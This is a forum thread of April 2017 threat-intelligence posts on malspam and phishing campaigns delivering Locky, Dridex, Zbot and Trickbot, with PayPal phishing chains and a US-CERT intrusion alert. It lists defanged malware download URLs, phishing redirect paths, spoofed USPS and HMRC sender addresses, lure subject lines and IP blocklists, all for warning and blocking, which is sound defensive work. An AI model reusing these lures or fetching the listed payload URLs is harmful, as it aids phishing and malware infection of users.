secretary@ ftccomplaintassistant .com ...


The link-in-the-email actually goes to a URL beginning http ://thecomplete180 .com/view.php?id= followed by a Base 64 encoded string that appears to be 6281 + recipient email address + 5434 ... this downloaded document is up to no good, but the VirusTotal detection rates are only 5/56*. The Word document itself tries to persuade victims to 'enable macros', which would be a -bad- idea:
> https://3.bp.blogspo...0/fake-word.png

* https://www.virustot...sis/1492451191/
Automated analysis [1] [2] shows network traffic:
1] https://malwr.com/an...jE3OTUxNzYwN2I/
Hosts
54.235.135.158
212.116.113.108
186.202.127.62
87.118.126.207


2] https://www.hybrid-a...vironmentId=100
Contacted Hosts (18)

... This gives us a pretty useful minimum blocklist:
178.170.189.254
185.146.1.4
185.48.56.63
185.80.53.76
188.127.237.232
193.105.240.2
194.1.239.63
195.54.163.94
212.116.113.108
46.148.26.87
47.90.202.88
77.246.149.100
87.118.126.207
88.214.236.158
91.230.211.67
93.189.43.36
"
___

Many PayPal Phish
- https://myonlinesecu...aypal-phishing/
17 Apr 2017 - "... -lots- of phishing attempts for Paypal login account credentials... These definitely do
-not- come from a “Trusted Sender”. The spelling and grammar mistakes in the email are more than enough to raise red flags...

Screenshot: https://myonlinesecu...-be-blocked.png

... If you follow-the-link when you use Internet Explorer you start with:
 http : //www .asclepiade .ch/sites/default/files/languages/red.html which -redirects- you to:
 https: //indimedia .co.uk/kasfolio/iceage3overlay/english/pp/
you see a webpage looking like this:
> https://myonlinesecu.../bitchboots.png

BUT if you use Firefox or Google Chrome, then you get:
 http ://www .asclepiade .ch/sites/default/files/languages/red.html which -redirects- you to:
 https ://indimedia .co.uk/kasfolio/iceage3overlay/english/pp/  which -redirects- to:
 https ://indimedia .co.uk/kasfolio/iceage3overlay/english/pp/login?cmd=_signin&dispatch=8b262247e1b6f7c468c785df9&locale=en_GB and gives the typical PayPal phishing page
 (you get a different random dispatch= number each time):
> https://myonlinesecu...ia-pp_phish.png

... Where pressing 'continue' takes you to the usual 'give me your credit card, bank account, address, phone number' and any other information they can think of, to be able to totally steal your identity and all financial accounts..."

indimedia .co.uk: 216.222.194.4: https://www.virustot....4/information/

> https://www.virustot...9184e/analysis/

> https://www.virustot...2b0f8/analysis/

asclepiade .ch: 213.221.153.48: https://www.virustot...48/information/
> https://www.virustot...0830a/analysis/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 17 April 2017 - 03:16 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1913 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 18 April 2017 - 01:26 PM

FYI...

'Protected View Mode' for MS Word docs
> https://www.askwoody...uge-of-malware/
April 17, 2017 - "... 'Protected View Mode' is enabled by default in Word 2010 and later, but Word 2007 and earlier -don’t- have Protected View... See screenshot:
> https://www.askwoody...view-768x45.jpg
If you click 'Enable Editing', the malware fires automatically — you don’t need to do anything more.
If you open an attached DOC from Gmail, it’s harmless, -unless- you download the file, -then- open the DOC in Word and -then- click 'Enable Editing'. Moral of the story: Use Gmail*. Failing that, don’t click 'Enable Editing'..."
* https://mail.google.com/mail/#inbox

>> https://www.howtogee...t-being-hacked/
April 13, 2017
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 18 April 2017 - 01:34 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1914 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 19 April 2017 - 04:21 AM

FYI...

Fake 'USPS' SPAM - delivers Zbot via fake Word online sites
- https://myonlinesecu...d-online-sites/
19 Apr 2017 - "... Today they have changed slightly again and now just have a link-to-a-site where you download a single executable file that pretends to be a plugin that allows you to read the documents online. Today (so far) are all Zbot/Panda Banking Trojans
 plugin_office_update_KB093211.exe (VirusTotal 7/61*) | Payload Security**...
* https://www.virustot...sis/1492568116/

** https://www.hybrid-a...vironmentId=100

Typical senders imitating USPS include:
    USPS Ground Support <zmesat742@ hetaudabazar .com>
    USPS Support Management <cykobezr0@ okamacr .com>
    USPS TechConnect <oysvuadv78382@ thewons .com>
    USPS Delivery <yrok10507057@ taviexport .com>
    USPS Support Management <gywer6@ nicolasprioux .com>
    USPS TechConnect <kapifa78036@ hashmkt .com>
    USPS Home Delivery <vyfhob22148305@ seedtech .co.in>
    USPS Priority Parcels <lameipgo65@ mtpub .com>
    USPS Priority <yhqez882670@ affection .org>

There are a multitude of different subjects. Some of the ones I received today are:
    WARNING: TROUBLE WITH YOUR ITEM
    ATTENTION REQUIRED: DETAILS ABOUT A IMPENDING REFUND
    URGENT USPS MONEYBACK INFORMATION CONCERNING YOUR PARCEL
    WARNING: you’re legally obliged to review the status of your parcel
    URGENT: notification of delay of your parcel
    Official letter concerning your order
    Major problems reported to the USPS customer support
    WARNING: INFORMATION ON YOUR IMPENDING REFUND
    IMMEDIATE ACTION REQUIRED: your shipment’s been postponed
    URGENT USPS MONEYBACK INFO CONCERNING YOUR SHIPMENT
    AUTOMATED letter regarding your shipment’s location
    OFFICIAL USPS REFUND INFO
    Official notice from USPS
    WARNING: ISSUES WITH YOUR SHIPMENT
    USPS USER URGENT NEW INFO CONCERNING YOUR PACKAGE
    WARNING: PROBLEMS WITH YOUR ORDER
    OFFICIAL USPS system statement
    USPS official notice: major trouble with your parcel
    USPS customer support team notice: your shipment has been postponed


Screenshots: https://myonlinesecu...USPS-email1.png

> https://myonlinesecu...USPS-email2.png

> https://myonlinesecu...USPS-email3.png

All have links-in-the-email body to a -fake- word online website and you are invited to download the latest plugin version to read the documents online:
> https://myonlinesecu...line-plugin.png

... The basic rule is NEVER open any attachment (or -link-) in an email, unless you are expecting it..."
___

Fake 'invoice' SPAM - delivers Dridex
- https://myonlinesecu...banking-trojan/
19 Apr 2017 - "An email with the subject of 'Copy of your 123-reg invoice (123-230044839)' [random numbers] pretending to come from no-reply@ 123-reg .co.uk with a malicious pdf attachment that contains an embedded word doc delivers Dridex banking Trojan...

Screenshot: https://myonlinesecu...ake-invoice.png

123-230044839-reg-invoice.pdf - Current Virus total detections 10/57*. Payload Security** shows a download from
 http ://jeanevermore .com/6gfd43 that is converted by the macro to redchip2.exe (VirusTotal 10/61***)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492601252/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
216.117.150.240
216.177.132.93
152.66.249.132
85.214.113.207
192.184.84.119


*** https://www.virustot...sis/1492594268/

- http://blog.dynamoo....ur-123-reg.html
19 Apr 2017 - "This -fake- financial spam does not come from 123-Reg (nor is it sent to 123-Reg customers). It has a malicious attachment.
    From     no-reply@ 123-reg .co.uk
    Date     Wed, 19 Apr 2017 17:19:51 +0500
    Subject     Copy of your 123-reg invoice ( 123-093702027 )
    Hi [redacted],
    Thank you for your order.
    Please find attached to this email a receipt for this payment.
    Help and support
    If you are still stuck why not contact our support team? Simply visit our 123-reg
    Support Centre and click on the Ask a Question tab.
    Thank you for choosing 123-reg.
    The 123-reg team...

 
The invoice number is randomly generated. The attachment is a PDF file with a name matching the invoice number (e.g. 123-093702027-reg-invoice.pdf). This PDF file appears to drop an Office document according to VirusTotal results 12/56*. Hybrid Analysis** shows the document dropping a malicious executable with a detection rate of 15/61***. It appears to contact the following IPs (some of which contain legitimate sites):
216.87.186.15 (Affinity Internet, US)
216.177.132.93 (Alentus Corporation, US)
152.66.249.132 (Budapest University of Technology and Economics, Budapest)
85.214.113.207 (Strato AG, Germany)
192.184.84.119 (RamNode LLC, US)
The general prognosis seems to be that this is dropping the Dridex banking trojan.
Recommended blocklist:
216.87.186.15
216.177.132.93
152.66.249.132
85.214.113.207
192.184.84.119
"
* https://virustotal.c...sis/1492608695/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...47872/analysis/
___

Malicious Excel Sheets...
- https://isc.sans.edu...l?storyid=22322
2017-04-19 - "... found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros:
> https://isc.sans.edu...images/xls1.png
... the macro was, as usual, to download the malicious PE file, to store it on the disk and to execute it. The PE file has a VT score of 10/60[1]. This is not the first time that I saw this way of passing data to the macro. It’s easy to configure campaigns with many URLs and samples without touching the macro. I had a bunch of 400 malicious Excel sheets to inspect... bad guys also use data stored in the document itself and access it from the VBA code. I also saw a few times white text on white background in Word documents..."
(More detail at the isc URL above.)
1] https://www.virustot...sis/1491843226/
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 19 April 2017 - 01:51 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1915 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 20 April 2017 - 09:32 AM

FYI...

Malvertising campaign - drops ISFB banking Trojan
- https://blog.malware...banking-trojan/
April 20, 2017 - "We have been witnessing a series of malvertising attacks that keep a low profile with decoy websites and strong IP address filtering... There have been similar uses of -fake- façades as a gateway to exploit kits. For instance, Magnitude EK is known to use gates that have to do with Bitcoin, investment websites and such, as detailed in this Proofpoint blog entry*...
* https://www.proofpoi...heme-windows-10
... In this particular case, the threat actor stole the web template from “Capital World Option“, a company that provides a platform for trading binary options. Participants must predict whether the price of an asset will rise or fall within a given time frame, which defines whether or not they will make money. Binary options have earned a bad reputation though and some countries have even banned them. Below is a screenshot of the legitimate website that is being impersonated. There are some differences between the real one and the fakes; the former is using SSL and was registered a while ago. Also, some of the website functionality is not working properly with the decoy versions.
Legitimate site: https://blog.malware...17/04/real2.png
---
Decoy site that ripped all the branding: https://blog.malware...017/04/fake.png
---
Those -fake- sites are only meant to be viewed if you are not a target of this particular malware campaign. In other words, if you load the infection chain from the malvertising call and see the site, you will not be infected. Infections happen when the fraudulent server forwards victims directly to a second gate, without showing them any of the site’s content. The same threat actor has registered -many- different domains all purporting to be lookalikes using a similar naming convention...
Conclusion: This particular campaign focused on a very specific malvertising chain leading to the RIG exploit kit and – as far as we could tell – dropping the same payload each time, no matter the geolocation of the victim. Banking -Trojans- have been a little bit forgotten about these days as they are overshadowed by ransomware. However, they still represent a significant threat and actually do operate safely in the shadows, manipulating banking portals to perform -wire-transfers- unbeknownst to their victims or even the banks they are targeting...
IOCs: ...
‘Binary options’ IP addresses:
217.23.1.65
217.23.1.66
217.23.1.67
217.23.1.104
217.23.1.130
217.23.1.187
217.23.1.200
..."
(More detail at the malwarebytes URL at the top.)
 

:ninja: :ninja:   :grrr:


.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1916 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 21 April 2017 - 10:35 AM

FYI...

Fake 'Payment Receipt' SPAM - delivers Locky
- https://myonlinesecu...ceipts-malspam/
21 Apr 2017 - "... an email with the subject of 'Payment Receipt 2724' or something similar pretending to come from random companies with a pdf attachment containing an embedded malicious word macro enabled doc which will download an encrypted txt file that is -transformed- into the Locky ransomware file redchip2.exe... Some of the subjects include (all have random numbers):
    Receipt 435
    Payment Receipt 2724
    Payment-2677
    Payment Receipt_739
    Payment#229


Screenshot: https://myonlinesecu...ent-Receipt.png

P2724.pdf - Current Virus total detections 9/57*. Payload Security** shows it drops an embedded macro enabled word doc (VirusTotal 12/59***) ... which downloads from
 sherwoodbusiness .com/9yg65 which is an encrypted-text-file that is converted-by-the-macro to redchip2.exe
(Payload Security[4] (VirusTotal 6/62[5]). There are loads of other download locations for the encrypted txt file... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1492775465/

** https://www.reverse....vironmentId=100
Contacted Hosts
216.117.141.38

*** https://www.virustot...sis/1492775793/

4] https://www.reverse....vironmentId=100

5] https://www.virustot...sis/1492775821/
redchip2.exe

sherwoodbusiness .com: 216.117.141.38: https://www.virustot...38/information/
> https://www.virustot...2a0d3/analysis/

Embedded docs in PDF files can infect you
> https://myonlinesecu...ily-infect-you/
22 Apr 2017
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 22 April 2017 - 06:33 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1917 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 24 April 2017 - 06:29 AM

FYI...

Fake 'Scan Data' SPAM - delivers Locky
- https://myonlinesecu...acro-word-docs/
24 Apr 2017 - "... another mass malspam onslaught with 2 separate emails with the subject of 'Scan Data' or '12345678.pdf' (random numbers) pretending to come from random email addresses at your-own-email-domain with a PDF attachment that contains an embedded malicious word doc with macros that delivers Locky ransomware... See HERE[1] for safe settings to stop these from working...
1] https://myonlinesecu...ily-infect-you/

Screenshot: https://myonlinesecu...-data-locky.png

Scan_066379.pdf - Current Virus total detections 13/55*. Payload Security** - drops 744951.doc
 (Virustotal 12/57***) - (Payload Security[4]) shows a download from
 http ://dorsetcountymaintenance .co.uk/87tgyu which is converted by the macro to redchip2.exe
(VirusTotal 10/59[5]) (Payload Security [6])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493033052/

** https://www.reverse....vironmentId=100
Contacted Hosts
188.65.115.102

*** https://www.virustot...sis/1493033505/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
188.65.115.102

5] https://www.virustot...sis/1493034283/
redchip2.exe

6] https://www.hybrid-a...vironmentId=100

dorsetcountymaintenance .co.uk: 188.65.115.102: https://www.virustot...02/information/
> https://www.virustot...24a1e/analysis/
___

Locky ransomware comeback - Necurs botnet
- https://www.helpnets...4/locky-necurs/
April 24, 2017 - "The Necurs botnet has, once again, begun pushing Locky ransomware on unsuspecting victims:
> https://www.helpnets...ecurs-locky.jpg
The botnet, which flip-flops from sending penny stock pump-and-dump emails to booby-trapped files that lead to malware (usually Locky or Dridex), has been spotted slinging thousands upon thousands of emails in the last three or four days*...
* http://blog.talosint...rns-necurs.html
... In the first part of the spam campaign, the emails contain no text except in the Subject line, which simply says 'Receipt' or 'Payment', followed by random numbers. Those numbers are seen again in the name of the attached PDF file... Later, the emails were made to look like they contained a scanned image in PDF format... In both cases, the attached PDF contains embedded Word documents with macros... there is currently no way to decrypt the files without paying the ransom..."

- https://isc.sans.edu...l?storyid=22334
2017-04-23 - "... The PDF contains JavaScript to extract the malicious Word document and launch Word. The user is prompted before this action takes place, but if you want to mitigate this, you can -disable- JavaScript. If you use Adobe Reader version 15.009.20069 or later, then the extracted Word document is marked with a mark-of-web, regardless if the containing PDF document is marked as such:
> https://isc.sans.edu...2304-014929.png
... After applying Microsoft's patch for CVE-2017-0199, a downloaded HTA is no longer executed, but it is -still- downloaded without user interaction..."

Cisco - Threat Outbreak Alerts
> https://tools.cisco....ting.x#~Threats
April 24, 2017 - Email Messages Distributing Malicious Software...

Locky has reemerged - borrowing attack techniques from Dridex
- http://www.zdnet.com...kier-than-ever/
April 24, 2017
___

Interpol finds nearly 9,000 infected servers in SE Asia
- http://www.reuters.c...r-idUSKBN17Q1BT
Apr 24, 2017 - "An anti-cybercrime operation by Interpol and investigators from seven southeast Asian nations revealed nearly 9,000 malware-laden servers and hundreds of compromised websites in the ASEAN region, Interpol said on Monday. Various types of malware, such as that targeting financial institutions, spreading ransomware, launching Distributed Denial of Service (DDoS) attacks and distributing spam were among the threats posed by the infected servers, the operation showed... Experts from seven private firms also participated in the operation run out of the Singapore-based Interpol Global Complex for Innovation (IGCI), with China providing some cyber intelligence, the international police body said on its website*...
* https://www.interpol.../2017/N2017-051
DDoS attacks have always been among the most common on the Internet, making use of hijacked and virus-infected computers to target websites until they can no longer cope with the scale of data requested. The operation also identified nearly 270 websites infected with a malware code, among them several government websites that may have contained citizens' personal data, Interpol added..."
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 24 April 2017 - 02:50 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1918 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 25 April 2017 - 05:06 AM

FYI...

Fake 'confirmation' SPAM - delivers Locky
- https://myonlinesecu...acro-word-docs/
25 Apr 2017 - "... another 2 mass malspam onslaughts with different email subjects. The first is 'confirmation_12345678.pdf' (random numbers) pretending to come from info@ random .tld with a PDF attachment that contains an embedded malicious word doc with macros that delivers Locky ransomware. The second is a -blank- email with the subject of 'paper', coming from random names, companies and email addresses. In all cases the alleged sending address is -spoofed- ... In both campaigns the PDF appears totally to be a -blank- page but still contains the embedded macro word doc that will infect you when opened. These macro enabled word docs embedded into PDF files can easily infect you, -IF- you have default PDF settings set in Adobe Reader. See HERE[1] for safe settings to stop these working...
1] https://myonlinesecu...ily-infect-you/
... 2 distinct malspam approaches today. First coming from 'scanner' (or other MFD, like scan, Epson, Printer, canon etc ) @ your-own-email-domain with a subject of 'scan data'. The second comes from totally random names @ your-own-email-domain with a subject of '12345678.pdf' (random numbers) and has a completely -empty- email body...

Screenshot1: https://myonlinesecu...onfirmation.png

Screenshot2: https://myonlinesecu...locky_paper.png

6446165b2.pdf - Current Virus total detections 13/56*. Payload Security** drops 216616.docm downloads from
 http ://parallelsolutions .nl/jhg67g  which is converted by the macro to pitupi2.exe
(VirusTotal 23/59***) (Payload Security[4])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493096091/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
159.253.0.19

*** https://www.virustot...sis/1493096408/
pitupi2.exe

4] https://www.hybrid-a...vironmentId=100

parallelsolutions .nl: 159.253.0.19: https://www.virustot...19/information/
> https://www.virustot...8c163/analysis/
___

Phish attacks responsible for 3/4 of all malware
- https://www.helpnets...ttacks-malware/
April 25, 2017 - "With phishing now widely used as a mechanism for distributing ransomware, a new NTT Security reveals that 77% of all detected ransomware globally was in four main sectors – business & professional services (28%), government (19%), health care (15%) and retail (15%):
> https://www.helpnets...ty-042017-2.jpg
While technical attacks on the newest vulnerabilities tend to dominate the media, many attacks rely on less technical means. According to the GTIR, phishing attacks were responsible for nearly three-quarters (73%) of all malware delivered to organizations, with government (65%) and business & professional services (25%) as the industry sectors most likely to be attacked at a global level. When it comes to attacks by country, the U.S. (41%), Netherlands (38%) and France (5%) were the top three sources of phishing attacks. The report also reveals that just 25 passwords accounted for nearly 33% of all authentication attempts against NTT Security honeypots last year. Over 76% of log on attempts included a password known to be implemented in the Mirai botnet – a botnet comprised of IoT devices, which was used to conduct, what were at the time, the largest ever distributed denial of service (DDoS) attacks. DDoS attacks represented less than 6% of attacks globally, but accounted for over 16% of all attacks from Asia and 23% of all attacks from Australia. Finance was the most commonly attacked industry globally, subject to 14% of all attacks. The finance sector was the only sector to appear in the top three across all of the geographic regions analysed, while manufacturing appeared in the top three in five of the six regions. Finance (14%), government (14%) and manufacturing (13%) were the top three most commonly attacked industry sectors:
> https://www.helpnets...ty-042017-1.jpg
... NTT Security summarizes data from over 3.5 -trillion- logs and 6.2 -billion- attacks for the 2017 Global Threat Intelligence Report (GTIR)*..."
* https://www.nttcomse...m/us/gtir-2017/
___

Phish: PayPal Credit Service Security Check
- https://security.int...-security-check
24 April 2017 - "People are reporting receiving -fake- emails as found below. Please be aware that the From address as well as the Subject line may change; however, the content with in the body of the email will stay the same with the exception of a change to the malicious URL link, which may have many different variations. Below is an example of the email people are receiving:
> https://security.int...24_14-51-41.png
... end of the -fake- email..."
 

:ninja: :ninja:    :grrr:


Edited by AplusWebMaster, 25 April 2017 - 08:21 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1919 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 26 April 2017 - 05:24 AM

FYI...

Fake 'DHL' SPAM - delivers js malware
- https://myonlinesecu...nknown-malware/
26 Apr 2017 - "... email with the subject of 'DHL Shipment Notification: 1104749373' pretending to come from DHL Customer Support <support@ dhl .com>  with a semi-random named zip attachment in the format of Pickup EXPRESS.Date2017-04-26.zip which delivers or tries to deliver some sort of malware...

Screenshot: https://myonlinesecu...-1104749373.png

Pickup EXPRESS.Date2017-04-26.zip: Extracts to: Pickup DOMESTIC EXPRESS Date2017-04-26.pdf.js
Current Virus total detections 4/57*. Payload Security**  | JoeSandbox*** all of which do show a connection to 47.91.74.140 80 horcor .com which looks to be connected to or hosted by Chinese online company Alibaba.
Payload Security shows an attempt to contact http ://horcor .com/gate.php?ff1 (ff1 – ff12) in turn via get requests BUT only when you expand the wscript.exe section and examine the script calls... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493200305/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.74.140

*** https://jbxcloud.joe...s/259442/1/html

horcor .com: 47.91.74.140: https://www.virustot...40/information/
___

JavaScript Malspam Campaigns
Multiple malicious JavaScript spam campaigns active in the wild
- https://www.zscaler....lspam-campaigns
April 25, 2017 - "... multiple active malspam campaigns with links to malicious JavaScript payloads in the wild. These JavaScript files when opened by the end user will trigger download and execution of malware executables belonging to various Dropper and Backdoor Trojan families. We have seen over 10,000 instances of malicious JavaScript payloads from these campaigns in last two weeks. The JavaScript files are highly obfuscated to avoid detection and on first look shared similarity to Angler EK's landing page. Two URL formats are commonly being used at this time, one with just alphanumeric characters in path and the other with string ‘.view’ in the path. The examples for these URLs are seen below:
http ://yountstreetglass [.]com/TRucDEpdoO4jsaFaF4wCTxl8h/
http ://unbunt [.]com/view-report-invoice-0000093/w0ru-bb26-w.view/
The javascript files have names which try to masquerade as bills and receipts of various services like DHL, UPS and Vodafone to name a few... When we opened the JavaScript, we observed that it was heavily obfuscated with random strings and numbers assigned to variables, which makes very little sense...
Conclusion: We should always be cautious when clicking on links or handling e-mail attachments received from an unknown sender. Threat actors keep changing their obfuscation techniques in an attempt to evade detection methods used by security engines. It is increasingly important to have multiple security layers to block these kinds of attacks..."
(More detail at the zscaler URL above.)

yountstreetglass .com: 107.180.2.25: https://www.virustot...25/information/
> https://www.virustot...364d9/analysis/

unbunt .com: 5.153.24.46: https://www.virustot...46/information/
> https://www.virustot...a3e79/analysis/
 

:ninja: :ninja:   :grrr:


Edited by AplusWebMaster, 26 April 2017 - 07:16 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#1920 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 11,104 posts

Posted 28 April 2017 - 07:38 AM

FYI...

Fake 'Secure email' SPAM - delivers Trickbot
- https://myonlinesecu...malspam-emails/
28 Apr 2017 - "An email with the subject of 'Secure email communication' pretending to come from HM Revenue & Customs <GSRPCommunication@ govsecure .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan... criminals sending these have registered various domains that look like genuine HMRC domains... So far we have found
    govsecure .co.uk
    gov-secure .co.uk
... they are registered via Godaddy as registrar and the emails are sent via City Network Hosting AB Sweden 89.46.82.3, 89.46.82.2, 89.42.141.46, 89.40.217.178, 89.40.217.179, 89.40.217.185 ...

Screenshot: https://myonlinesecu...mmunication.png

Unsuccessful_Payments_Documents.doc - Current Virus total detections 3/56*. Payload Security** shows a download  via powershell from http ://elevationstairs .ca/fonts/60c5776c175c54d2.png  which of course is
-not- an image file but a renamed .exe (VirusTotal 8/61***) (Payload Security [4])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1493381297/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
70.33.246.140
107.22.214.64
184.160.113.13
217.31.111.153


*** https://www.virustot...sis/1493382383/

4] https://www.hybrid-a...vironmentId=100

elevationstairs .ca: 70.33.246.140: https://www.virustot...40/information/
> https://www.virustot...2c048/analysis/
___

Intrusions - Multiple Victims across Multiple Sectors
- https://www.us-cert....lerts/TA17-117A
April 27, 2017 - "... Overview:
The National Cybersecurity and Communications Integration Center (NCCIC) has become aware of an emerging sophisticated campaign, occurring since at least May 2016, that uses multiple malware implants. Initial victims have been identified in several sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.
According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.
Although this activity is still under investigation, NCCIC is sharing this information to provide organizations information for the detection of potential compromises within their organizations.
NCCIC will update this document as information becomes available.
For a downloadable copy of this report and listings of IOCs, see:
> https://www.us-cert....17-093-01C.xlsx
IOCs (.xlsx)
61.97.241.239    IPv4    IP Watchlist: https://www.virustot...39/information/
103.208.86.129    IPv4    IP Watchlist: https://www.virustot...29/information/
109.237.108.202    IPv4    IP Watchlist: https://www.virustot...02/information/
109.237.111.175    IPv4    IP Watchlist: https://www.virustot...75/information/
109.248.222.85    IPv4    IP Watchlist: https://www.virustot...85/information/
95.47.156.86    IPv4    IP Watchlist: https://www.virustot...86/information/
162.243.6.98    IPv4    IP Watchlist: https://www.virustot...98/information/
160.202.163.78    IPv4    IP Watchlist: https://www.virustot...78/information/
86.106.102.3    IPv4    IP Watchlist: https://www.virustot....3/information/
110.10.176.181    IPv4    IP Watchlist: https://www.virustot...81/information/
185.133.40.63    IPv4    IP Watchlist: https://www.virustot...63/information/
185.14.185.189    IPv4    IP Watchlist: https://www.virustot...89/information/
95.183.52.57    IPv4    IP Watchlist: https://www.virustot...57/information/
185.117.88.78    IPv4    IP Watchlist: https://www.virustot...78/information/
185.117.88.77    IPv4    IP Watchlist: https://www.virustot...77/information/
185.117.88.82    IPv4    IP Watchlist: https://www.virustot...82/information/
109.237.108.150    IPv4    IP Watchlist: https://www.virustot...50/information/
211.110.17.209    IPv4    IP Watchlist: https://www.virustot...09/information/
81.176.239.56    IPv4    IP Watchlist: https://www.virustot...56/information/
151.236.20.16    IPv4    IP Watchlist: https://www.virustot...16/information/
107.181.160.109    IPv4    IP Watchlist: https://www.virustot...09/information/
151.101.100.73    IPv4    IP Watchlist: https://www.virustot...73/information/
158.255.208.170    IPv4    IP Watchlist: https://www.virustot...70/information/
158.255.208.189    IPv4    IP Watchlist: https://www.virustot...89/information/
158.255.208.61    IPv4    IP Watchlist: https://www.virustot...61/information/
160.202.163.79    IPv4    IP Watchlist: https://www.virustot...79/information/
160.202.163.82    IPv4    IP Watchlist: https://www.virustot...82/information/
160.202.163.90    IPv4    IP Watchlist: https://www.virustot...90/information/
160.202.163.91    IPv4    IP Watchlist: https://www.virustot...91/information/
185.117.88.81    IPv4    IP Watchlist: https://www.virustot...81/information/
185.141.25.33    IPv4    IP Watchlist: https://www.virustot...33/information/
31.184.198.23    IPv4    IP Watchlist: https://www.virustot...23/information/
31.184.198.38    IPv4    IP Watchlist: https://www.virustot...38/information/
92.242.144.2    IPv4    IP Watchlist: https://www.virustot....2/information/
183.134.11.84    IPv4    IP Watchlist: https://www.virustot...84/information/

> https://www.helpnets...ttack-campaign/
April 28, 2017
___

Mac's - OSX.Dok malware intercepts web traffic
> https://blog.malware...ts-web-traffic/
April 28, 2017 - "Most Mac malware tends to be unsophisticated. Although it has some rather unpolished and awkward aspects, a new piece of Mac malware, dubbed 'OSX.Dok', breaks out of that typical mold. OSX.Dok, which was discovered by Check Point*, uses sophisticated means to monitor — and potentially alter — all HTTP and HTTPS traffic to and from the infected Mac. This means that the malware is capable, for example, of capturing account credentials for any website users log into, which offers many opportunities for theft of cash and data. Further, OSX.Dok could modify the data being sent and received for the purpose of -redirecting- users to malicious websites in place of legitimate ones...
* http://blog.checkpoi...-https-traffic/
Distribution method: OSX.Dok comes in the form of a file named Dokument.zip, which is found being -emailed- to victims in -phishing- emails. Victims primarily are located in Europe...
Removal: Removal of the malware can be accomplished by simply removing the two aforementioned LaunchAgents files, but there are many leftovers and modifications to the system that -cannot- be as easily reversed...
Consumers: Malwarebytes Anti-Malware for Mac will detect the important components of this malware as OSX.Dok, disabling the active infection. However, when it comes to the other changes that are not easily reversed, which introduce vulnerabilities and potential behavior changes, additional measures will be needed. For people who don’t know their way around in the Terminal and the arcane corners of the system, it would be wise to seek the assistance of an expert, or erase the hard drive and restore the system from a backup made prior to infection.
Businesses: The impact on business could be much more severe, as it could expose information that could allow an attacker to gain access to company resources. For example, consider the potential damage if, while infected, you visited an internal company page that provided instructions for how to connect to the company VPN and access internal company services. The malware would have sent all that information to the malicious proxy server. If you have been infected by this malware in a business environment, you should consult with your IT department, so they can be aware of the risks and begin to mitigate them."
(More detail at the malwarebytes -and- checkpoint URL's above.)
 

:ninja: :ninja:    :grrr:


